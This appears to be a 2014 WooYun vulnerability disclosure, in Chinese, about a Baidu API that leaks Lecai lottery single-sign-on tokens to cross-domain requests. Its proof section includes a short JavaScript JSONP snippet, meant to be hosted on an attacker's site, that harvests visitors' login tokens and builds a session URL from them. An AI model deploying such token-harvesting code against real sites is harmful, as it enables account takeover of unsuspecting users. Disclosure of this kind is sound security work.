当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085436

漏洞标题:百度某接口鉴权不严格可跨域获取用户CAIPIAO站登录凭据

相关厂商:百度

漏洞作者: moult

提交时间:2014-12-01 14:30

修复时间:2015-01-15 14:32

公开时间:2015-01-15 14:32

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-03: 厂商已经确认,细节仅向厂商公开
2014-12-13: 细节向核心白帽子及相关领域专家公开
2014-12-23: 细节向普通白帽子公开
2015-01-02: 细节向实习白帽子公开
2015-01-15: 细节向公众公开

简要描述:

百度一API接口鉴权不严格、容易被CSRF获取用户的单点登录URL。

详细说明:

话说在百度首页有个百度乐彩的选项卡。点击刷余额,会发出一条如下的异步请求。

QQ20141201-1@2x.png" width="500


然后,这个请求精简一下,那些看上去进行鉴权的参数都去掉。得到下面的网址。(这些参数也只是看上去好像用来鉴权,其实根本没用起来)

http://www.baidu.com/home/xman/data/xcardget?id=10&get=user


手动请求,得到下面的一堆信息:

{
    "errNo": "0",
    "id": "10",
    "data": {
        "balance": "0元",
        "prizeinfo": {
            "count": "0",
            "url": "http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Forder%2Fwin%2F%3FagentId%3D5881"
        },
        "token": {
            "bd_info": ".......",
            "bd_sign": ".......",
            "bd_appid": "2490867",
            "bd_bind": true
        }
    }
}


再复制一下“我的采彡PIAO”的连接地址,得到百度向乐彩跳转的单点登录网址:

http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Fmylottery%2F%3FagentId%3D5881&bd_info=......&bd_sign=......&bd_appid=2490867&bd_bind=true


顿时我就受精了,本着职业操守,顺手将接口中取得的数据拼凑一下。得到新的单点登录地址了。
退出乐彩,黏贴地址,擦,单点登录登陆成功。
再生成一个地址,换个IP,换个浏览器,吖,居然也可以~~
至于漏洞影响么,好像也没什么大影响。就是有损百度严谨的技术氛围啊。。。

漏洞证明:

要证明吗?
那就在自己网站上挂个JS代码吧。专业收集访客的单点登录地址。
等我多收集一点再来证明吧。

<script type="text/javascript">
        var url = 'http://www.baidu.com/home/xman/data/xcardget?id=10&get=user&callback=?';
        $.getJSON(url,function(json) {
            var bd_info = json.data.token.bd_info;
            var bd_bind = json.data.token.bd_bind;
            var bd_sign = json.data.token.bd_sign;
            var bd_appid = json.data.token.bd_appid;
            var lcurl = json.data.prizeinfo.url;
            lcurl+="&bd_info="+bd_info+"&bd_bind="+bd_bind+"&bd_sign="+bd_sign+"&bd_appid="+bd_appid;
            //成功收集到用户的乐彩单点登录网址。
        });
    </script>

修复方案:

验证严格一点就OK啦~~

版权声明:转载请注明来源 moult@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-12-03 12:08

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无